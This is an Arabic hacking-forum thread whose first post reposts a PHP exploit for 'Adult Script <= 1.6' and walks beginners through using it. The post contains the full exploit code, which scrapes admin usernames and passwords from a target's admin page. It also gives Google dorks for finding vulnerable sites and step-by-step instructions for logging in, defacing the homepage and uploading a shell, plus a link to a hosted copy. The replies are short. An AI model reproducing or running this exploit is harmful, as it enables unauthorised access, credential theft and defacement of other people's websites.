ثغره حيلوه وقويه هع هع

ثغره حيلوه وقويه هع هع


النتائج 1 إلى 6 من 6

الموضوع: ثغره حيلوه وقويه هع هع

  1. #1
    هكر نشيط الصورة الرمزية جندي اول للهكر
    تاريخ التسجيل
    Aug 2009
    الدولة
    البلاد المظلمه >الجيوش<
    المشاركات
    108

    Mbrok ثغره حيلوه وقويه هع هع

    imzourencity+imatawen
    عزيز الزائر نعتدر عن الازعاج ** تبين لنا انك لم تقم بتسجيل الدخول نرجو منك التعريف بنفسك .. ان لم تكن مسجلا فالرجاء التسجيل لتنضم الى اسرتنا وشكرا





    امزورن سيتي مدينة الترفيه لشباب 2009
    **سؤال البحث

    نتائج البحث عدد المساهمات مواضيع

    --------------------------------------------------------------------------------
    بحث متقدم

    ****

    imzourencity+imatawen :: امتاون امزورن سيتي :: مواضيع قديمة شاطر | المزيد!

    المزيد!
    استعرض المواضيع الجديدة منذ آخر زيارة لي
    استعرض مُساهماتك
    استعراض المواضيع التي لم يتم الرد عليها
    المواضيع المراقبة
    --------------------------------------------------------------------------------
    أضف إلى المفضلة
    ارسل إلى صديق(ة)
    قم بنسخ عنوان ال BBCode للصفحة
    طبع هذه الصفحة

    حصريا شـرح ثغرة لاختراق سكربت مواقع جنسية للمبتدئين Adult ****** Unauthorized Admin

    كاتب الموضوع رسالة
    كخعتضاهيث
    فريق هكر ايمتاون



    عدد الرسائل: 174
    :
    السٌّمعَة: 0
    تاريخ التسجيل: 21/04/2008

    موضوع: حصريا شـرح ثغرة لاختراق سكربت مواقع جنسية للمبتدئين Adult ****** Unauthorized Admin الإثنين أغسطس 25, 2008 10:06 pm

    --------------------------------------------------------------------------------

    بــــــــــــــــــــــــ ــــسم الله الـــــــــــــــرحــــــ مـــــن الــــــــــــــرحـــــــ ـيــــــــــــــــم

    الحمد لله الذي جعلنا مسلمين واللهم صل و سلم على سيدنا محمد و على آله و صحبه أجمعين و من

    تبعهم بإحسان إلى يوم الدين آمين

    السلام عليكم و رحمة الله و بركاته أهل بيت الهكر

    اليوم باذن الله سنقوم بشرح ثغرة جديدة نزلت تقريبا في جميع مواقع السكيوريتي بتاريخ 2007-12-13

    اسم الثغرة هو

    Adult ****** Unauthorized Administrative Access Exploit

    و الثغرة مكتوبة بلغة PHP

    و هذه الثغرة تخص سكربت معين الغرض منه بالتحديد انه يستعمل في المواقع الاباحية التي تعرض

    الفيديوهات

    نشوف رابط الثغرة معا في موقع الميل ورم

    Adult Script <= 1.6 Unauthorized Administrative Access Exploit
    كود PHP:
    ( ($_SESSION['adminid']=="") && ($_SESSION['admintype'] !=1))
    {
    header("********: logout.php"); // Bypass Me :D
    }
    </pre>
    <br>
    <b>Dork</b>:<br>
    inurl:submit-user-link.html<br>
    inurl:video-listing-cat<br>
    inurl:hosted-videos<br>
    inurl:porn-listing-cat<br>
    "Powered By Adult******.NET"<br>
    "Copyright 2007 [IAG].Adult******.v1.5.Nulled"<br>
    <br>
    <form method="POST" action="">
    <input name="adres" type="text" value="Target example: http://www.site.com/" size="70" onFocus="if(this.value=='Target example: http://www.site.com/')this.value=''" onBlur="if(this.value=='')this.value='Target example: http://www.site.com/'">
    <input name="yolla" type="submit" value="Send">
    </form>

    <br>
    <?php
    function dosya_indir($liz0){


    $ch = curl_init();
    $timeout = 0;
    curl_setopt ($ch, CURLOPT_URL, $liz0);
    curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
    $veri = curl_exec($ch);
    curl_close($ch);

    return $veri;

    }

    $desen='|value="(.*)"|';

    if($_POST[yolla])
    {
    $adres=$_POST[adres];

    if(!eregi("http",$adres))
    {
    $adres="http://".$adres;
    }
    if($adres=="") { echo 'Boş Yerleri Doldurun'; exit(); }
    echo 'Target= '.htmlspecialchars($adres)."<br>";
    sleep(1);
    echo 'Sending Evil Code.......<br>';
    $kaynak=dosya_indir($adres."/admin/administrator.php");
    sleep(5);

    if(eregi('value="',$kaynak)) {
    echo "Exploit Has Been Succeful <br>";
    preg_match_all($desen,$kaynak,$sonuc);
    echo "<a target='_blank' href='".$adres."/admin/'>".$adres."/admin/</a><br>";
    echo "<b>Username</b> :".htmlspecialchars($sonuc[1][0])."<br>";
    echo "<b>Password</b>:".htmlspecialchars($sonuc[1][1])."<br>";
    echo $adres."/admin/videolinks_view.php edit video and upload ****l ";
    }
    else
    {
    echo "Exploit Has Been Failed! <br>";
    }


    }
    ?>

    # milw0rm.com [2007-12-13]


    جيد الان سنتعلم كيف يتم استغلال هذا النوع من الثغرات

    الاستغلال يكون كالتالي تقوم بنسخ كود الثغرة كاملا ثم تنسخه بالمفكرة و تقوم بتسميته ثم تحفظ الملف

    بامتداد PHP و ترفعه الى موقعك اى لازم اولا يكون عندك مساحة خاصة بك


    قمت برفع الملف على مساحة مجانية بـــ ripway لكن الثغرة لم تشتغل لكن انا لم اجرب على موقع

    lycos فممكن أن تنجح اذن فما الحل |5|

    لازم يكون عندك استضافة مدفوعة لكى يشتغل السكربت تمام

    طيب انت تقول انا ما عندي أنا اقولك ولا يهمك وجدت باحد المنتديات التركية الرابط جـــــــــاهز زي

    العسل |11|


    و هذا رابط الثغرة و قمت بتجربته و هو شغال تمام

    http://www.r57.li/adult.php


    طيب الان نبدأ بشرح كيفية التعامل مع السكربت و جلب معلومات الادمن |ok|

    وهي زبدة الموضوع |7|

    تابع الشرح كما في الصورة

    This image has been resized. Click this bar to view the full image. The original image is sized 701x503.


    كما نلاحظ بالصورة كل شئ وا ضح كما نرى ان السكريت سهل جدا و كل شئ موضح امامك في

    السكربت نفسه الان وش تعمل الخطوة الثانية هي البحث عن مواقع مصابة و ذلك باستعمال الدورك في

    محرك البحث قوقــــــــــــل شوف الصورة



    انا اخترت الدورك الثاني على سبيل المثال لا الحصر انت حر في اختيار ايها شئت |7|

    Google


    تضع الدورك في محرك البحث و تضغط بحث تابع الصورة

    This image has been resized. Click this bar to view the full image. The original image is sized 800x600.

    ستلاحظ ظهور نتائج البحث و المواقع المصابة كثيرة و انت كل مرة استعمل دورك مختلف كي توسع

    مجال البحث ...مثلا انا اخترت احد المواقع تابع الصورة

    This image has been resized. Click this bar to view the full image. The original image is sized 800x600.

    الان تروح لرابط السكربت و تبدأ بالعمل بعد ما تختار احد المواقع و بامكانك ان تجرب على الكل واحد

    واحد تابع الصورة

    This image has been resized. Click this bar to view the full image. The original image is sized 800x717.

    الان طبق كما هو موضح في الصورة

    كما تلاحظون عند انتهاء العملية و بعد ظهور معلومات الادمن كاتب الثغرة يقول انه بالامكان رفع شل

    في الرابط المبين ادناه upload ****l انا جربت ارفع شل على شكل صورة لكن ما نجحت الطريقة

    معي و هذه اتركها للمحترفيين ان شاء الله يجدون لها حل |7|

    طيب انت طبقت خلاص و جبت اسم و كلمة سر الادمن الان تذهب الى رابط الدخول الى لوحة التحكم

    تابع الصورة

    This image has been resized. Click this bar to view the full image. The original image is sized 800x533.

    بعد وضع اسم و كلمة المرور سيتم نقلك الى لو حة تحكم الادمن تابع الصورة


    This image has been resized. Click this bar to view the full image. The original image is sized 800x600.

    الان ننتقل الى الخطوة الاخيرة و هي تنفيذ الهجوم رفع الاندكس تابع الصورة

    This image has been resized. Click this bar to view the full image. The original image is sized 800x600.

    بعد رفع الاكواد الخاصة بصفحة اختراقك او كود التحويل لا تنسى شئ مهم تابع الصورة

    This image has been resized. Click this bar to view the full image. The original image is sized 732x341.


    مبـــــــــــــــــروك الان تم الاختراق اذهب الى الصفحة الرئيسية و شاهد الاختراق

    لآى استفسارات أو أسئلة |1| فأنا جاهز ان شاء الله

    تـــــــــــم بحمد الله

    هذا وما كان من توفيق فمن الله وحده, وما كان من خطأ أو سهو أو زلل أو نسيان فمني ومن الشيطان

    وأعوذ بالله أن أذكركم به وأنساه.

  2. #2
    هكر مبتديء
    تاريخ التسجيل
    Nov 2009
    الدولة
    الجزائر قلبي وغزة نبضه
    المشاركات
    17

    افتراضي رد: ثغره حيلوه وقويه هع هع

    الشرح منقول أخي

    +

    الصور لا تظهر


  3. #3
    هكر مبتديء
    تاريخ التسجيل
    Nov 2009
    الدولة
    الجزائر قلبي وغزة نبضه
    المشاركات
    17

    افتراضي رد: ثغره حيلوه وقويه هع هع

    الشرح منقول أخي

    +

    الصور لا تظهر


  4. #4

    افتراضي رد: ثغره حيلوه وقويه هع هع

    اخي ماهو كود الاستغلال لاهنت

  5. #5

    افتراضي رد: ثغره حيلوه وقويه هع هع

    شكرا جندى على التوبك الجميل

  6. #6

    افتراضي رد: ثغره حيلوه وقويه هع هع

    ايش هذه المسخره ؟؟!!!!

    الموضوع يــــغـــلـــق
    فيديو اليوم


    اللهم صلي على سيدنا محمد ، على عَدد خَلقِك وَعلى قدر عَظَمَتك وعلى قَدرٍ محبتك له .

    سجل إختراقك الأن في Aljyyosh.org بمميزات عديده



    من مواضيعي:


    سُبْحَانَكَ اللَّهُمَّ وبَحَمْدكَ أشْهدُ أنْ لا إلهَ إلا أنْتَ أَسْتَغْفِرُكَ وأتُوبُ إِلَيْكَ

المواضيع المتشابهه

  1. مشاركات: 16
    آخر مشاركة: 08-23-2015, 06:29 PM
  2. ثغره جديده..مش عارف إزاى أوصلها..
    بواسطة black_dream في المنتدى قسم المشاكل والإستفسارات
    مشاركات: 3
    آخر مشاركة: 05-14-2012, 05:50 PM
  3. مشاركات: 10
    آخر مشاركة: 02-12-2012, 02:52 AM
  4. آسهل ثغره للمبتدئ ./ آشوفك تقول معرف
    بواسطة المكار في المنتدى قسم الثغرات
    مشاركات: 10
    آخر مشاركة: 09-04-2010, 12:48 PM
  5. ثغره xss
    بواسطة &&&الهكر الاسود&&& في المنتدى قسم الثغرات
    مشاركات: 10
    آخر مشاركة: 08-27-2010, 03:59 PM

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •